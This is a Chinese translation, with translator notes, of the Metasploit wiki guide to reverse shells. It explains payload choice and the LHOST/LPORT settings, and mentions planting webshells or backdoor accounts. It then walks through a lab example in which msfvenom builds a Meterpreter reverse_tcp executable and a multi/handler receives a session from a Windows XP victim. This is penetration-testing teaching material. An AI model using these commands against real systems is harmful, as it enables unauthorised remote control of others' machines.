• 原文地址：https://github.com/rapid7/metasploit-framework/wiki/How-to-use-a-reverse-shell-in-Metasploit
• 作者：Metasploit Community
• 譯者：王一航 2018-06-10
• 校對：王一航 2018-06-10

眾所周知，有兩種流行的 Shell 的類型：反向 Shell （譯者注：攻擊者監(jiān)聽端口，被攻擊者連接）和 正向 Shell（譯者注：被攻擊者監(jiān)聽端口，攻擊者連接）
譯者注：由于 C/S 結(jié)構(gòu)的程序開發(fā)中，一般我們將監(jiān)聽端口的一方稱為服務(wù)器，而主動連接的一方稱為客戶端。站在攻擊者的角度上，正向 Shel 即為攻擊者主動連接服務(wù)器，此謂之正向；而反向 Shell 中，攻擊者為服務(wù)器，被攻擊者主動連接攻擊者，此謂之反向

Payload 的基本使用已經(jīng)在 用戶手冊 中寫的很詳細了，但是，學(xué)習(xí)如何使用反向 Shell 仍然是一個在 Metasploit 社區(qū)中被詢問最頻繁的問題。另外，事實上反向 Shell 在十次滲透中幾乎有九次都可能被用到，因此在這個文檔中我們將對此進行深入解釋。

列出所有的 Metasploit 反向 Shell

直到現(xiàn)在， Metasploit Framework 已經(jīng)有了 168 個不同的反向 Shell 的 Payload
我們這里并沒有列出所有的反向 Shell 的列表，因為沒必要浪費文章的篇幅。
但是如果你想要得到這個列表的話，你可以使用 msfpayload 命令 （譯者注：msfpayload 目前已經(jīng)被 msfvenom 代替，msfvenom 由 msfpayload 與 msfencode 結(jié)合而成，具體官方公告可以參考：https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom）

# ./msfpayload -l |grep reverse
./msfvenom -l |grep reverse

作為一個經(jīng)驗法則，我們一般總是選擇 meterpreter（譯者注：對比于反向 Shell 和 正向 Shell），因為 Meterpreter 的確能為我們提供更多的后滲透測試的支持。例如：Railgun（譯者注：這是 Metasploit 對 Windows Meterpreter Session 提供的一個功能，可以注入 DLL 文件到指定的程序），后滲透測試模塊，獨立的 Meterpreter 命令（例如：攝像頭控制），等等。

• 以 Windows 作為目標系統(tǒng)，最被頻繁使用的反向 Shell 是 windows/meterpreter/reverse。但是你也可以嘗試一下 windows/meterpreter/reverse_http, windows/meterpreter/reverse_https, 因為它們（譯者注：原文中并沒有說清楚 它們 指的是什么，個人感覺應(yīng)該是反向 Shell 的流量并沒有經(jīng)過加密，可以直接被防火墻嗅探到，但是如果基于 HTTP 或者 HTTPS 那么就可以實現(xiàn)基于應(yīng)用層的加密，這樣更難被檢測到）的網(wǎng)絡(luò)流量可能會有一點點不正常。

• 以 Linux 作為目標系統(tǒng)，你可以嘗試 linux/x86/meterpreter/reverse_tcp 這個針對 32 位的 Payload，當(dāng)然也可以嘗試 64 位的。然而，你應(yīng)該知道的是 linux/x86/shell_reverse_tcp 這個 Payload 是最穩(wěn)定的

什么時候應(yīng)該使用反向 Shell

如果你認為你所在的條件符合如下條件之一（但不限于），那么你就應(yīng)該考慮使用反向 Shell

• 目標機器在一個不同（相對攻擊者而言）的私有網(wǎng)絡(luò)
• 目標機器的防火墻阻擋了所有入口連接（這種情況正向 Shell 是會被防火墻阻擋的）
• 由于一些原因，你的 Payload 不能綁定在應(yīng)該綁定的端口的時候
• 你還不能確定應(yīng)該選擇反向 Shell 還是正向 Shell 的時候

什么時候不應(yīng)該使用反向 Shell

• 一般來說，如果你已經(jīng)在目標機器的某個已存在的服務(wù)上種植了后門，那么你就不再需要反向 Shell。例如：如果目標機器已經(jīng)運行了一個 SSH 服務(wù)器，那么你可以通過后門程序添加一個新的用戶并且直接使用。
• 如果目標機器運行了一個 WEB 服務(wù)器并且支持服務(wù)端腳本語言，那么你就可以種植一個目標語言的后門。例如：很多 Apache HTTP Server 都支持 PHP 語言，那么你就可以使用一個 PHP 的 webshell；IIS 服務(wù)器通常支持 ASP 語言或者 ASP.net。Metasploit Framework 提供所有這些語言的 Payload （當(dāng)然也包括許多其他語言的 Payload）
• 與 VNC 相同，遠程桌面，SMB(psexec) 或者等等其他的遠程管理工具也一樣。

如何在生成 Payload 的時候配置反向 Shell Payload 的參數(shù)

如果你想使用 msfpayload（譯者注：已被廢棄）或者 msfvenom 來生成反向 Shell 的 Payload，那么你必須知道如何配置如下的參數(shù)：

• LHOST - 從字面上看（譯者注：Local HOST），該參數(shù)表示你想讓你的目標機器連接的地址。如果你在一個本地局域網(wǎng)，那么你的目標機器可能就不能直接連接到你的機器了，除非你們在同一個網(wǎng)絡(luò)中。這種情況下，你需要 找到你的公網(wǎng)IP ，然后在你的網(wǎng)絡(luò)中配置端口轉(zhuǎn)發(fā)連接到你自己的用來攻擊的電腦。LHOST 這個參數(shù)不可以被設(shè)置為 localhost, 0.0.0.0, 127.0.0.1，如果你這么設(shè)置了，那么你其實在讓目標機器連接自己。
• LPORT - 這個參數(shù)表示目標機器要連接的端口號

當(dāng)你在配置反向 Shell 的監(jiān)聽器的時候，你也需要至少配置 LHOST 和 LPORT 這兩個參數(shù)，但是這和在生成 Payload 的時候的配置的含義有所不同

• LHOST - 該參數(shù)表示你想讓你的監(jiān)聽器綁定的 IP 地址
• LPORT - 該參數(shù)表示你想讓你的監(jiān)聽器綁定的端口號

你應(yīng)該確保監(jiān)聽器在目標機器執(zhí)行反向 Shell 的 Payload 之前就開始監(jiān)聽

實例

在下面的實例中，我們有兩個主機

主機 A

• 攻擊者機器（用來接受 Payload 作用產(chǎn)生的 Session）
• IP : 192.168.1.123 (ifconfig)
• 與受害者的主機在同一網(wǎng)段

主機 B

• 受害者機器
• Windows XP
• IP : 192.168.1.80 (ipconfig)
• 與攻擊者在同一個網(wǎng)段
• 為了測試效果，并沒有開啟防火墻
• 為了測試效果，并沒有開啟反病毒軟件

第一步：生成可執(zhí)行的Payload
在攻擊者的機器上，運行如下 msfpayload 命令（或者 msfvenom，任何一個都可以）

$ ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 X > /tmp/iambad.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 287
Options: {"LHOST"=>"192.168.1.123", "LPORT"=>"4444"}

第二步：將可執(zhí)行的 Payload 拷貝到機器 B （也就是受害者的機器）

第三步：在機器A（也就是攻擊者）上配置 Payload Handler

$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.123:4444
[*] Starting the payload handler...

第四步：雙擊剛才生成的惡意可執(zhí)行程序（在機器B，也就是受害者機器上）

第五步：這個時候應(yīng)該就可以在攻擊者的機器A上看到一個 meterpreter/payload 的 session 了

$ ./msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.123:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500
meterpreter >

Meterpreter 命令提示符表示由當(dāng)前 payload 生成的 session 已經(jīng)被激活